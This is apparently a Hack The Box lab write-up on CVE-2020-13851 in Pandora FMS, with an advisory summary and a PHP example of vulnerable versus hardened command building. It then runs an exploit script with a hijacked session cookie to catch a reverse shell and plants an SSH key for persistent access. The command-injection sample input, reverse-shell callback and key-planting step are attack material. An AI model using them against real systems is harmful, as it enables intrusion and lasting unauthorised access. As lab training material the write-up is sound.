CVE-2020-13851


A vulnerability was found in Artica Pandora FMS 7.44. It has been rated as critical. This issue affects some unknown processing of the component Event Handler. The manipulation with an unknown input leads to an injection vulnerability. Using CWE to declare the problem leads to CWE-74: the software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. Impacted is confidentiality, integrity, and availability.
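
The CWE-74 pattern named above, as an added illustration that is not Pandora FMS source: a hypothetical event-response handler builds a shell command from a user-supplied target, first by splicing it in raw, then after validating and quoting it. The function names, the ping command and the sample inputs are assumptions constructed for the example.

```php
<?php
// Added example, not Pandora FMS code: a hypothetical event-response handler
// showing the CWE-74 pattern the advisory describes and one hardened form.

// Vulnerable: the externally supplied target is spliced into the command string,
// so shell metacharacters in it change how the downstream shell parses the command.
function build_event_response_vulnerable(string $target): string
{
    return "ping -c 1 " . $target;
}

// Reject anything that is not a plain hostname or IPv4 literal. Validation rejects
// bad input outright rather than trying to strip characters out of it.
function validate_target(string $target): ?string
{
    if ($target === '' || strlen($target) > 253) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$/', $target)) {
        return null;
    }
    return $target;
}

// Hardened: validate first, then quote so the value reaches the program as a single
// argument; escapeshellarg() single-quotes the value and escapes embedded quotes.
function build_event_response_hardened(string $target): string
{
    $safe = validate_target($target);
    if ($safe === null) {
        throw new InvalidArgumentException("rejected event response target: $target");
    }
    return 'ping -c 1 ' . escapeshellarg($safe);
}

// Constructed inputs: a benign host and one carrying an injected second command.
foreach (['host.example', 'host.example; id'] as $input) {
    echo "vulnerable: " . build_event_response_vulnerable($input) . "\n";
    try {
        echo "hardened:   " . build_event_response_hardened($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened:   " . $e->getMessage() . "\n";
    }
}
```

The vulnerable path emits `ping -c 1 host.example; id`, which the shell runs as two commands; the hardened path rejects that input before any command is built.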

Exploit


I found an exploit online

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 cve-2020-13851.py -t http://localhost:8008 -c nh2mou87br8ntaitmofvnur5db -lhost 10.10.14.2 -lport 8888
Pandora FMS 7.44 CVE-2020-13851
No credentials provided. Using PHP Session cookie.
sending payload:

Launching the exploit. The -c flag supplies the session cookie retrieved from exploiting [[pandora_cve-2021-32099#cve-2021-32099|CVE-2021-32099]].

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.136] 33538
bash: cannot set terminal process group (50309): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console$ whoami
whoami
matt
matt@pandora:/var/www/pandora/pandora_console$ hostname
hostname
pandora
matt@pandora:/var/www/pandora/pandora_console$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1168123  bytes 179373657 (179.3 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1241718  bytes 1010725876 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 33481  bytes 8570690 (8.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 33481  bytes 8570690 (8.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement to the matt user was achieved by exploiting [[#cve-2020-13851|CVE-2020-13851]].

SSH


matt@pandora:/var/www/pandora/pandora_console/images$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ ssh matt@$IP          
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu 20 Apr 12:40:54 UTC 2023
 
  System load:           0.0
  Usage of /:            65.5% of 4.87GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             246
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:364
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
matt@pandora:~$ whoami
matt
matt@pandora:~$ hostname
pandora
matt@pandora:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1169668  bytes 179646506 (179.6 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1243304  bytes 1011761119 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36802  bytes 9708938 (9.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36802  bytes 9708938 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0